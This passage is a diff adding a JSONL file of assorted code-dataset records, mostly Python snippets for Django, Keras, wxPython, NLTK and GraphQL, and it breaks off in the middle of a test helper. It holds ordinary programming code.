diff --git "a/1305.jsonl" "b/1305.jsonl" new file mode 100644--- /dev/null +++ "b/1305.jsonl" @@ -0,0 +1,397 @@ +{"seq_id": "41182765", "text": "from django.urls import reverse\nfrom mezzanine.conf import settings\nfrom mezzanine.core.request import current_request\nfrom mezzanine.utils.email import send_mail_template\n\n\ndef send_unavailable_email(variation, quantity=None, to_addr=None, bcc_addresses=None):\n if to_addr is None:\n to_addr = \"Undisclosed Recipients <{}>\".format(settings.DEFAULT_FROM_EMAIL),\n\n context = {\n 'cart_url': current_request().build_absolute_uri(reverse(\"shop_cart\")),\n 'variation': variation,\n 'quantity': quantity\n }\n send_mail_template(\n \"[{}] Weekly Order Item Unavailable\".format(settings.SITE_TITLE),\n \"ffcsa_core/send_unavailable_email\",\n settings.DEFAULT_FROM_EMAIL,\n to_addr,\n context=context,\n fail_silently=False,\n addr_bcc=bcc_addresses\n )\n", "sub_path": "ffcsa/core/availability.py", "file_name": "availability.py", "file_ext": "py", "file_size_in_byte": 823, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "mezzanine.conf.settings.DEFAULT_FROM_EMAIL", "line_number": 9, "usage_type": "attribute"}, {"api_name": "mezzanine.conf.settings", "line_number": 9, "usage_type": "name"}, {"api_name": "mezzanine.core.request.current_request", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 12, "usage_type": "call"}, {"api_name": "mezzanine.utils.email.send_mail_template", "line_number": 16, "usage_type": "call"}, {"api_name": "mezzanine.conf.settings.SITE_TITLE", "line_number": 17, "usage_type": "attribute"}, {"api_name": "mezzanine.conf.settings", "line_number": 17, "usage_type": "name"}, {"api_name": "mezzanine.conf.settings.DEFAULT_FROM_EMAIL", "line_number": 19, "usage_type": "attribute"}, {"api_name": "mezzanine.conf.settings", "line_number": 19, "usage_type": "name"}]} +{"seq_id": "458446750", "text": "from django.core.management.base import BaseCommand, CommandError\nfrom news.models import Post, Category\n\nclass Command(BaseCommand):\n help = 'Подсказка вашей команды' # показывает подсказку при вводе \"python manage.py <ваша команда> --help\"\n requires_migrations_checks = True # напоминать ли о миграциях. Если тру — то будет напоминание о том, что не сделаны все миграции (если такие есть)\n\n def add_arguments(self, parser):\n parser.add_argument('category', type=str)\n\n def handle(self, *args, **options):\n answer = input(f'Вы правда хотите удалить все статьи в категории {options[\"category\"]}? 
yes/no: ')\n\n if answer != 'yes':\n self.stdout.write(self.style.ERROR('Cancelled')) # on a wrong confirmation, report that nothing was deleted and stop\n return\n\n try:\n category = Category.objects.get(name=options['category'])\n Post.objects.filter(categories__name=category.name).delete()\n self.stdout.write(self.style.SUCCESS(\n f'Successfully deleted all news from category {category.name}'))\n except Category.DoesNotExist:\n self.stdout.write(self.style.ERROR(f'Could not find category {options[\"category\"]}'))", "sub_path": "news_portal/NewsPaper/news/management/commands/mycommand.py", "file_name": "mycommand.py", "file_ext": "py", "file_size_in_byte": 1469, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.core.management.base.BaseCommand", "line_number": 4, "usage_type": "name"}, {"api_name": "news.models.Category.objects.get", "line_number": 19, "usage_type": "call"}, {"api_name": "news.models.Category.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "news.models.Category", "line_number": 19, "usage_type": "name"}, {"api_name": "news.models.Post.objects.filter", "line_number": 20, "usage_type": "call"}, {"api_name": "news.models.Post.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "news.models.Post", "line_number": 20, "usage_type": "name"}, {"api_name": "news.models.Category.DoesNotExist", "line_number": 23, "usage_type": "attribute"}, {"api_name": "news.models.Category", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "105289275", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef update_trace_linear(trace, spike, alpha, decay):\n trace *= decay\n trace += alpha * spike\n return trace\n\n\ndef compute_final_trace(spikes, alpha, decay):\n final = (spikes * decay ** np.arange(spikes.size - 1, -1, -1)) * alpha\n return final.sum()\n\n\nif __name__ == \"__main__\":\n time = 50\n alpha = 0.6\n decay = 0.1\n trace = 0.0\n trace_list = [trace]\n spikes = np.ones(time)\n\n for i in range(spikes.size):\n trace = update_trace_linear(trace, spikes[i], alpha, decay)\n trace_list.append(trace)\n\n print(trace_list[-1], compute_final_trace(spikes, alpha, decay))\n\n plt.plot(range(time + 1), trace_list)\n plt.show()\n", "sub_path": "extra/max_trace.py", "file_name": "max_trace.py", "file_ext": "py", "file_size_in_byte": 722, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "numpy.arange", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}]} +{"seq_id": "648033558", "text": "from django.utils import timezone\nfrom visitors.utils import get_ip\nfrom visitors.models import Visitor\nimport logging\n\nlogging.basicConfig(filename='logging.log',level=logging.INFO)\n\nclass VisitorsMiddleware(object):\n\n def process_request(self, request):\n ip = get_ip(request)\n try:\n visitor = Visitor.objects.get(ip=ip)\n except Visitor.DoesNotExist:\n visitor = Visitor(ip=ip)\n visitor.last_seen = timezone.now()\n visitor.requests += 1\n visitor.save()\n logging.info(' Visitor {0} with ip {1} requested {2} at {3}'.format(visitor.name, ip, 
request.path, visitor.last_seen))\n return\n", "sub_path": "shop_production_version/shop/visitors/middleware.py", "file_name": "middleware.py", "file_ext": "py", "file_size_in_byte": 663, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "logging.basicConfig", "line_number": 6, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 6, "usage_type": "attribute"}, {"api_name": "visitors.utils.get_ip", "line_number": 11, "usage_type": "call"}, {"api_name": "visitors.models.Visitor.objects.get", "line_number": 13, "usage_type": "call"}, {"api_name": "visitors.models.Visitor.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "visitors.models.Visitor", "line_number": 13, "usage_type": "name"}, {"api_name": "visitors.models.Visitor.DoesNotExist", "line_number": 14, "usage_type": "attribute"}, {"api_name": "visitors.models.Visitor", "line_number": 14, "usage_type": "name"}, {"api_name": "visitors.models.Visitor", "line_number": 15, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 16, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 16, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "371317921", "text": "from typing import List\n\nclass Solution:\n def findLucky(self, arr: List[int]) -> int:\n from collections import Counter\n c = dict(Counter(arr))\n\n result = -1\n\n for key, value in c.items():\n if key == value:\n result = max(result, key)\n\n return result\n\n\n", "sub_path": "LeetCode/findLucky.py", "file_name": "findLucky.py", "file_ext": "py", "file_size_in_byte": 315, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "typing.List", "line_number": 4, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "219737868", "text": "\"\"\"Graphene support\"\"\"\n\nfrom typing import Any, Dict, Optional\n\nfrom baretypes import Info, WebSocket\nimport graphene\nimport graphql\nfrom graphql.subscription.map_async_iterator import MapAsyncIterator\n\nfrom ..websocket_instance import GraphQLWebSocketHandlerInstanceBase\n\n\nclass GrapheneWebSocketHandlerInstance(GraphQLWebSocketHandlerInstanceBase):\n \"\"\"A GraphQL WebSocket handler instance\"\"\"\n\n def __init__(self, schema: graphene.Schema, web_socket: WebSocket, info: Info) -> None:\n super().__init__(web_socket, info)\n self.schema = schema\n\n async def subscribe(\n self,\n query: str,\n variables: Optional[Dict[str, Any]],\n operation_name: Optional[str]\n ) -> MapAsyncIterator:\n return await self.schema.subscribe(\n query,\n variable_values=variables,\n operation_name=operation_name,\n context_value=self.info\n )\n\n async def query(\n self,\n query: str,\n variables: Optional[Dict[str, Any]],\n operation_name: Optional[str]\n ) -> graphql.ExecutionResult:\n return await self.schema.execute_async(\n source=query,\n variable_values=variables,\n operation_name=operation_name,\n context_value=self.info\n )\n", "sub_path": "bareasgi_graphql_next/graphene/websocket_instance.py", "file_name": "websocket_instance.py", "file_ext": "py", "file_size_in_byte": 1331, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "websocket_instance.GraphQLWebSocketHandlerInstanceBase", "line_number": 13, "usage_type": "name"}, {"api_name": 
"graphene.Schema", "line_number": 16, "usage_type": "attribute"}, {"api_name": "baretypes.WebSocket", "line_number": 16, "usage_type": "name"}, {"api_name": "baretypes.Info", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 23, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 23, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 23, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 24, "usage_type": "name"}, {"api_name": "graphql.subscription.map_async_iterator.MapAsyncIterator", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 36, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 36, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 36, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 37, "usage_type": "name"}, {"api_name": "graphql.ExecutionResult", "line_number": 38, "usage_type": "attribute"}]} +{"seq_id": "532794709", "text": "import re\nfrom setuptools import setup, find_packages\nimport os\n\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nwith open(os.path.join(here, \"requirements.txt\")) as f:\n required = f.read().splitlines()\n\nversion_file = os.path.join(here, \"mond_project\", \"_version.py\")\nverstrline = open(version_file, \"rt\").read()\nVSRE = r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\"\nmo = re.search(VSRE, verstrline, re.M)\nif mo:\n this_version = mo.group(1)\n print(\"mond_project version = \", this_version)\nelse:\n raise RuntimeError(\"Unable to find version string in %s\" %(version_file))\n\nsetup(\n name=\"mond_project\",\n version=this_version,\n description=\"Code for final project on MOND vs LCDM\",\n url=\"https://github.com/wagoner47/mond_project/tree/master\",\n packages=find_packages(exclude=[\"tests\", \"docs\"]),\n install_requires=required)\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 870, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.path.abspath", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 14, "usage_type": "call"}, {"api_name": "re.M", "line_number": 14, "usage_type": "attribute"}, {"api_name": "setuptools.setup", "line_number": 21, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "639512283", "text": "import numpy as np\nimport os\nfrom tensorflow.keras.utils import to_categorical\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import LSTM, Dense\nfrom tensorflow.keras.callbacks import ModelCheckpoint, ReduceLROnPlateau\n\n\nfrom sklearn.metrics import multilabel_confusion_matrix\nfrom tensorflow.keras.models import load_model\n\n\nos.environ['CUDA_VISIBLE_DEVICES'] = '1'\nos.environ['TF_FORCE_GPU_ALLOW_GROWTH'] = 'true'\n\nactions = [\n 'help_gesture_1',\n 'trash1',\n 'trash2'\n]\n\ndata = np.concatenate([\n 
np.load('dataset/seq_help_gesture_1636731666.npy'),\n np.load('dataset/seq_trash1_1636731666.npy'),\n np.load('dataset/seq_trash2_1636731666.npy')\n], axis=0)\n\ndata.shape\n\nx_data = data[:, :, :-1]\nlabels = data[:, 0, -1]\n\nprint(x_data.shape)\nprint(labels.shape)\n\ny_data = to_categorical(labels, num_classes=len(actions))\ny_data.shape\n\nx_data = x_data.astype(np.float32)\ny_data = y_data.astype(np.float32)\n\nx_train, x_val, y_train, y_val = train_test_split(x_data, y_data, test_size=0.1, random_state=2021)\n\nprint(x_train.shape, y_train.shape)\nprint(x_val.shape, y_val.shape)\n\n\nmodel = Sequential([\n LSTM(64, activation='relu', input_shape=x_train.shape[1:3]),\n Dense(32, activation='relu'),\n Dense(len(actions), activation='softmax')\n])\n\nmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['acc'])\nmodel.summary()\n\n\nhistory = model.fit(\n x_train,\n y_train,\n validation_data=(x_val, y_val),\n epochs=200,\n callbacks=[\n ModelCheckpoint('models/model.h5', monitor='val_acc', verbose=1, save_best_only=True, mode='auto'),\n ReduceLROnPlateau(monitor='val_acc', factor=0.5, patience=50, verbose=1, mode='auto')\n ]\n)\n\n\n\n\n\nmodel = load_model('models/model.h5')\n\ny_pred = model.predict(x_val)\n\nmultilabel_confusion_matrix(np.argmax(y_val, axis=1), np.argmax(y_pred, axis=1))", "sub_path": "proj/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 1921, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils.to_categorical", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 41, "usage_type": "attribute"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 49, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.LSTM", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 52, "usage_type": "call"}, {"api_name": "tensorflow.keras.callbacks.ModelCheckpoint", "line_number": 65, "usage_type": "call"}, {"api_name": "tensorflow.keras.callbacks.ReduceLROnPlateau", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 74, "usage_type": "call"}, {"api_name": "sklearn.metrics.multilabel_confusion_matrix", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 78, "usage_type": "call"}]} +{"seq_id": "519088694", "text": "from django.db import migrations\n\nfrom corehq.util.django_migrations import run_once_off_migration\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('users', '0002_domainrequest'),\n ]\n\n operations = [\n run_once_off_migration(\n 'migrate_roles_permissions_feb2019', required_commit='8e8243bc80964e6981fcb89a712776e9faf97397'\n )\n ]\n", 
"sub_path": "corehq/apps/users/migrations/0003_roles_permissions_update.py", "file_name": "0003_roles_permissions_update.py", "file_ext": "py", "file_size_in_byte": 385, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 6, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 6, "usage_type": "name"}, {"api_name": "corehq.util.django_migrations.run_once_off_migration", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "354555234", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 27 23:12:18 2019\n\n@author: Guilherme\n\"\"\"\nimport itertools\nimport numpy as np\nimport copy\nfrom Processor import Processor\n\nclass CrossProcessor:\n \n def __init__(self, training, testing, target_var, random_state, verbose):\n \n self.training = training\n self.testing = testing\n self.target_var = target_var\n self.random_state = random_state\n self.verbose = verbose\n self.stages = []\n self.ite_c = 0\n \n def addStage(self, stage):\n self.stages.append(stage)\n \n def addStages(self, stages):\n self.stages = stages\n \n def mixer(self):\n combinations = []\n for stage in self.stages:\n combinations.append(np.arange(len(stage.functions)))\n \n self.combinations = list(itertools.product(*combinations))\n \n def process(self):\n processor = Processor(self.training, self.testing, self.target_var, self.random_state)\n processor.addStages(copy.deepcopy(self.stages), self.combinations[self.ite_c])\n processor.exec_()\n self.ite_c += 1\n return processor\n #Missing Values Treatment\n # Drop missing values/ Impute missing values\n \n #Outlier Detection\n # Zscore/Mahalanobis\n \n #Outlier Treatment\n # Smoothing/Removal\n \n #Feature Selection\n # RFE/PCA", "sub_path": "CrossProcessor.py", "file_name": "CrossProcessor.py", "file_ext": "py", "file_size_in_byte": 1398, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "numpy.arange", "line_number": 33, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 35, "usage_type": "call"}, {"api_name": "Processor.Processor", "line_number": 38, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "86963801", "text": "#---------------------------------------------------------------------\n# findreplacedialog.py\n#\n# Author: Jason Gedge\n#\n# InfO: The wax FindReplaceDialog now has pre-programmed\n# find/replace functionality to make everyone's life\n# easier. These are the functions that are required\n# to be in the control that you pass to FindReplaceDialog:\n# => GetValue;\n# Return the string of text in the control\n# => [Get/Set]Selection;\n# Get/set the selected text (or position of insertion)\n# => Replace;\n# Replace a certain block of text in the control\n# => GetStringSelection;\n# ...\n#\n# TODO:\n# -\n#---------------------------------------------------------------------\n\nfrom messagedialog import MessageDialog\nimport string\nimport os\nimport wx\nimport waxobject\n\nSPECIAL_ATTRS = ['GetValue', 'Replace', 'SetSelection', 'GetSelection',\n 'GetStringSelection']\n\nclass FindReplaceDialog(wx.FindReplaceDialog, waxobject.WaxObject):\n \"\"\" A Find/Replace dialog with pre-programmed find/replace functionality. 
\"\"\"\n\n __events__ = {\n 'Find': wx.EVT_COMMAND_FIND,\n 'FindNext': wx.EVT_COMMAND_FIND_NEXT,\n 'FindReplace': wx.EVT_COMMAND_FIND_REPLACE,\n 'FindReplaceAll': wx.EVT_COMMAND_FIND_REPLACE_ALL,\n 'FindClose': wx.EVT_COMMAND_FIND_CLOSE,\n }\n\n def __init__(self, parent, control=None, title=\"\", replace=0):\n style = 0\n if replace:\n style = wx.FR_REPLACEDIALOG\n\n self.data = wx.FindReplaceData()\n self.data.SetFlags(wx.FR_DOWN) # search down by default\n wx.FindReplaceDialog.__init__(self, parent, self.data, title, style)\n\n self.parent = parent\n self.control = control\n self.nl_error_fix = False\n if isinstance(self.control, wx.TextCtrl):\n self.nl_error_fix = True\n\t\n for attrname in SPECIAL_ATTRS:\n setattr(self, 'f'+attrname, None)\n\n if control:\n for attrname in SPECIAL_ATTRS:\n f = getattr(control, attrname, None)\n setattr(self, 'f'+attrname, f)\n\n # Depending on what functions we got, we can handle certain events\n # so this is where check and set the events appropriately\n if self.fGetSelection and self.fSetSelection and self.fGetValue:\n if self.fGetStringSelection and self.fReplace:\n self.OnFindReplace = self._OnFindReplace\n self.OnFindReplaceAll = self._OnFindReplaceAll\n\n self.OnFind = self._OnFind\n self.OnFindNext = self._OnFindNext\n\n self.BindEvents()\n\n #\n # This will return a tuple (start, end) specifying the start position\n # and the end position of the string, or (-1, -1) if not found\n #\n def DoFind(self, what):\n flags = self.data.GetFlags()\n\n cs = 0\n if (flags & wx.FR_MATCHCASE) == wx.FR_MATCHCASE:\n cs = 1\n dir = -1\n if (flags & wx.FR_DOWN) == wx.FR_DOWN:\n dir = 1\n whole_word = 0\n if (flags & wx.FR_WHOLEWORD) == wx.FR_WHOLEWORD:\n whole_word = 1\n\n # Depending on direction, start/end points differ\n if dir == -1:\n start = self.fGetSelection()[0] - 1\n end = -1\n else:\n start = self.fGetSelection()[1]\n end = -2\n\n res = string_find( self.fGetValue(), what, start, end,\n dir=dir, case_sensitive=cs, whole_word=whole_word,\n\t\t\t nl_error_fix=self.nl_error_fix)\n\n return (res, res + len(what))\n\n #\n # The next four are the pre-programmed find/replace events\n #\n def _OnFind(self, event):\n start, end = self.DoFind(event.GetFindString())\n if start == -1:\n msg = MessageDialog(self, 'Find/Replace',\n 'Cannot find \"' + event.GetFindString() + '\"',\n icon='information')\n msg.ShowModal()\n else:\n self.fSetSelection(start, end)\n\n def _OnFindNext(self, event):\n self._OnFind(event)\n\n def _OnFindReplace(self, event):\n if event.GetFindString() == '':\n return\n\n if self.fGetStringSelection() == event.GetFindString():\n start, end = self.fGetSelection()\n pos = start + len(event.GetReplaceString())\n self.fReplace(start, end, event.GetReplaceString())\n self.fSetSelection(pos, pos)\n\n self.OnFind(event)\n\n def _OnFindReplaceAll(self, event):\n if event.GetFindString() == '':\n return\n\n self.fSetSelection(0, 0)\n start, end = self.DoFind(event.GetFindString())\n while start != -1:\n pos = start + len(event.GetReplaceString())\n self.fReplace(start, end, event.GetReplaceString())\n self.fSetSelection(pos, pos)\n start, end = self.DoFind(event.GetFindString())\n\n #\n # The next two are kind of like a hack to prevent opening the same\n # FindReplaceDialog twice for the one parent (which shuts down\n # everything if it does happen)\n #\n def OnFindClose(self, event=None):\n del self.parent._fr_opened\n self.Destroy()\n\n def Show(self):\n try:\n tval = self.parent._fr_opened\n except AttributeError:\n self.parent._fr_opened = 5\n 
wx.FindReplaceDialog.Show(self)\n\n def ShowModal(self):\n result = wx.FindReplaceDialog.ShowModal(self)\n if result == wx.ID_OK:\n return 'ok'\n else:\n return 'cancel'\n\n#\n# auxiliary functions\n\n#\n# Checks to see if the match is a whole word\n#\n_alphanum = string.ascii_letters + string.digits\n\ndef is_whole_word(str, what, start):\n end = start + len(what) - 1\n if (start == 0 or not str[start - 1] in _alphanum) and \\\n (end == len(str) - 1 or not str[end + 1] in _alphanum):\n return True\n return False\n\n#\n# Needed because of different EOLs used by operating systems in TextBox\n#\ndef newline_error_fix(str):\n if os.name == 'nt':\t\t# change for overall windows\n return str.replace('\\n', '\\r\\n')\n else:\n return str\n\n#\n# Character case checking\n#\ndef chr_is_equal(c1, c2, case_sensitive):\n if case_sensitive:\n return c1 == c2\n else:\n return c1.lower() == c2.lower()\n\n#\n# string_find - I think the name speaks for itself\n# str: the string to search through\n# what: what you're looking for\n# start: the starting point of the search\n# end: the end point of the search\n# dir: 1 for downwards, -1 for upwards\n#\n# Sloppy, but it works. I should clean this up later\n#\ndef string_find(str, what, start, end, dir=1, case_sensitive=0, whole_word=0, nl_error_fix=1):\n \"\"\"similar to string.find, except there are more options available\"\"\"\n\n if nl_error_fix:\n str = newline_error_fix(str)\n\n partial_match = False # Set to true when a partial match is started\n start_char = 0 # start point of 'what' string\n end_char = len(what) - 1 # end point\n # Direction is upwards, so swap start/end points\n if dir == -1:\n start_char, end_char = end_char, start_char\n curr_char = start_char # where we are in the 'what' string\n # Yet another fix for windows. 
If -2 is passed, we go right to the end\n if end == -2:\n end = len(str)\n # An iterator to go over the search string\n xiter = xrange(start, end, dir).__iter__()\n y = 0\n # If case-insensitive, lowercase the pattern up front\n if case_sensitive == 0:\n what = what.lower()\n\n try:\n # StopIteration exception should break this loop\n while True:\n # Get the next position in the search string\n x = xiter.next()\n # Get the current character of the search string\n char_check = str[x]\n # If that char is the same as the char we're looking at\n if chr_is_equal(char_check, what[curr_char], case_sensitive):\n # If we're at the end of the 'what' string\n if curr_char == end_char:\n # One must also include the # of newlines :/\n pos = x - curr_char\n # Check for whole word match if required\n if whole_word == 1:\n if is_whole_word(str, what, pos):\n return pos# + newline_error_fix(str, x)\n else: # not a whole word, start again\n curr_char = start_char\n if partial_match and chr_is_equal(char_check, what[curr_char], case_sensitive):\n xiter = xrange(x, end, dir).__iter__()\n else:\n return pos# + newline_error_fix(str, x)\n else:\n # Not at the end, go to the next character\n curr_char += dir\n partial_match = True\n else:\n # Not the same char, let's revert back\n curr_char = start_char\n if partial_match and chr_is_equal(char_check, what[curr_char], case_sensitive):\n xiter = xrange(x, end, dir).__iter__()\n except StopIteration:\n pass\n # Never found it\n return -1\n\n", "sub_path": "EasyPython/wax/findreplacedialog.py", "file_name": "findreplacedialog.py", "file_ext": "py", "file_size_in_byte": 9383, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "wx.FindReplaceDialog", "line_number": 32, "usage_type": "attribute"}, {"api_name": "waxobject.WaxObject", "line_number": 32, "usage_type": "attribute"}, {"api_name": "wx.EVT_COMMAND_FIND", "line_number": 36, "usage_type": "attribute"}, {"api_name": "wx.EVT_COMMAND_FIND_NEXT", "line_number": 37, "usage_type": "attribute"}, {"api_name": "wx.EVT_COMMAND_FIND_REPLACE", "line_number": 38, "usage_type": "attribute"}, {"api_name": "wx.EVT_COMMAND_FIND_REPLACE_ALL", "line_number": 39, "usage_type": "attribute"}, {"api_name": "wx.EVT_COMMAND_FIND_CLOSE", "line_number": 40, "usage_type": "attribute"}, {"api_name": "wx.FR_REPLACEDIALOG", "line_number": 46, "usage_type": "attribute"}, {"api_name": "wx.FindReplaceData", "line_number": 48, "usage_type": "call"}, {"api_name": "wx.FR_DOWN", "line_number": 49, "usage_type": "attribute"}, {"api_name": "wx.FindReplaceDialog.__init__", "line_number": 50, "usage_type": "call"}, {"api_name": "wx.FindReplaceDialog", "line_number": 50, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 55, "usage_type": "attribute"}, {"api_name": "wx.FR_MATCHCASE", "line_number": 86, "usage_type": "attribute"}, {"api_name": "wx.FR_DOWN", "line_number": 89, "usage_type": "attribute"}, {"api_name": "wx.FR_WHOLEWORD", "line_number": 92, "usage_type": "attribute"}, {"api_name": "messagedialog.MessageDialog", "line_number": 115, "usage_type": "call"}, {"api_name": "wx.FindReplaceDialog.Show", "line_number": 163, "usage_type": "call"}, {"api_name": "wx.FindReplaceDialog", "line_number": 163, "usage_type": "attribute"}, {"api_name": "wx.FindReplaceDialog.ShowModal", "line_number": 166, "usage_type": "call"}, {"api_name": "wx.FindReplaceDialog", "line_number": 166, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 167, "usage_type": "attribute"}, {"api_name": "string.ascii_letters", "line_number": 178, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 178, "usage_type": "attribute"}, 
{"api_name": "os.name", "line_number": 191, "usage_type": "attribute"}]} +{"seq_id": "208388173", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 6 17:34:52 2020\n\n@author: lenovo\n\"\"\"\nimport operator\nimport nltk\nimport re\n\nstop_words_file='stop_words.txt'\n#with open(english,'r',encoding='utf-8') as file:\n# u=file.read()\n\nlist_word_result=[]\n#for i in range(1,4):\n# english='body'+str(i)+'.txt'\n# f1=open(english,'r',encoding='utf-8')\n# u=f1.readline()\n# while u!='' :\n# string=re.sub('[^\\w ]','',u)\n# string=string.lower()#小写\n# list_word_result.append(nltk.word_tokenize(string))\n# u=f1.readline()\n# #print(nltk.pos_tag(nltk.word_tokenize(str))) #对分完词的结果进行词性标注\n# f1.close()\n\nf1=open('all_review.txt','r',encoding='utf-8')\nu=f1.readline()\nwhile u!='' :\n string=re.sub('[^\\w ]','',u)\n string=string.lower()#小写\n list_word_result.append(nltk.word_tokenize(string))\n u=f1.readline()\n#print(nltk.pos_tag(nltk.word_tokenize(str))) #对分完词的结果进行词性标注\nf1.close()\n\n#停用词添加\n#stop_words=[]\n#f2=open(stop_words_file,'r',encoding='utf-8')\n#sr=f2.readline().rstrip(\"\\n\")\n#while sr!='' :\n# stop_words.append(sr)\n# sr=f2.readline().rstrip(\"\\n\")\n#f2.close()\n\n\n# 利用字典进行处理\ndic = {}\nfor wordlist in list_word_result:\n for word in wordlist:\n# if word in stop_words:#停止词则跳过\n# continue\n if word not in dic:\n dic[word] = 1\n else:\n dic[word] = dic[word] + 1\nswd=sorted(dic.items(), key=operator.itemgetter(1),reverse=True)#排序\n#输出前100个频数单词\ncount=0\nfor sw in swd:\n print(sw)\n count+=1\n if count>=100:\n break\n#\n##将有的词写成文档\n#f3=open('words.txt','w',encoding='utf-8')\n#for word in dic.keys():\n# f3.writelines(word+'\\n')\n#f3.close()\n#\n##将有的频数写成文档d\n#f4=open('frequency.txt','w',encoding='utf-8')\n#for frequency in dic.values():\n# f4.writelines(str(frequency)+'\\n')\n#f4.close()\n#\n#将有的频数写成文档\nf5=open('all_items.txt','w',encoding='utf-8')\nfor word,frequency in dic.items():\n f5.writelines(word+','+str(frequency)+'\\n')\nf5.close()\n\n", "sub_path": "python/2020年美赛/test2.py", "file_name": "test2.py", "file_ext": "py", "file_size_in_byte": 2111, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "re.sub", "line_number": 31, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 33, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "400666540", "text": "from pycm.utils.data_structs import stack\n\ndef assert_layer_state(layer, stack=None, prev_layer=None, next_layer=None):\n def test(attr, v):\n if 